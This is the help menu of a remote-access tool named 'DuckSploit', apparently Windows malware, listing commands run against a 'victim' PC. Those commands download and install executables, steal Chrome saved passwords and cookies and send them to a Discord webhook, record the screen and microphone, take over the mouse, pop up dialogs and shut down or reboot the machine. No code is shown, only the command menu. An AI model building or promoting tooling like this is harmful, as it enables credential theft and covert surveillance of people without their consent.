=============================================
       ¤ HELP | DuckSploit *ARGS* ¤
=============================================
 .
#############################################
##/!\ CONFIG IS NEEDED BEFORE ATTACK /!\#####
#############################################
.
 .
=============================================
------------------CONFIG---------------------
=============================================
   ipconfig <my ip> - config your ip
.
 .
=============================================
------------------Exploit--------------------
=============================================
   open <app package> - open mensionned package
   download <url> <path> - download file in mensioned path
   install <path> - install .exe file
.
   stealpwds <discord webhook url> - steal victim's chrome saved passwords and send them into mensioned webhook
   stealcookies <discord webhook url> - steal victim's chrome cookies and send them into the mensioned webhook
.
   recordscreen <time in seconds> - record the vitim's screen for mesnioned time
   recordmicro <time in second> - record the victim's micro for mensioned time
 .
=============================================
----------------Alert Window-----------------
=============================================
   createfile <content> - create a file named "text.txt" and write his content 
   msg [-file, -text] <title> <line1> <line2> - create a custom alert dialog and execute on the pc of the victim's
 .
.
=============================================
---------------Mouse Controll----------------
=============================================
   locatemouse - get current victim 's mouse locations
   mousemove <x> <y> - move victim's mouse with x and y
   mousescroll <values bethween -1000 and 1000> - scroll the mouse to this vaules
   mouseclick [left, right, middle] - do the mensionned click 
.
=============================================
--------------------Mysc---------------------
=============================================
   shutdown - shutdown victim's pc
   reboot - reboot victim's pc
   closesession - close the victim's session
   exit - quit cmd
   help - geeting help
.
 .
.
@DuckpvpTeam - all rights reserved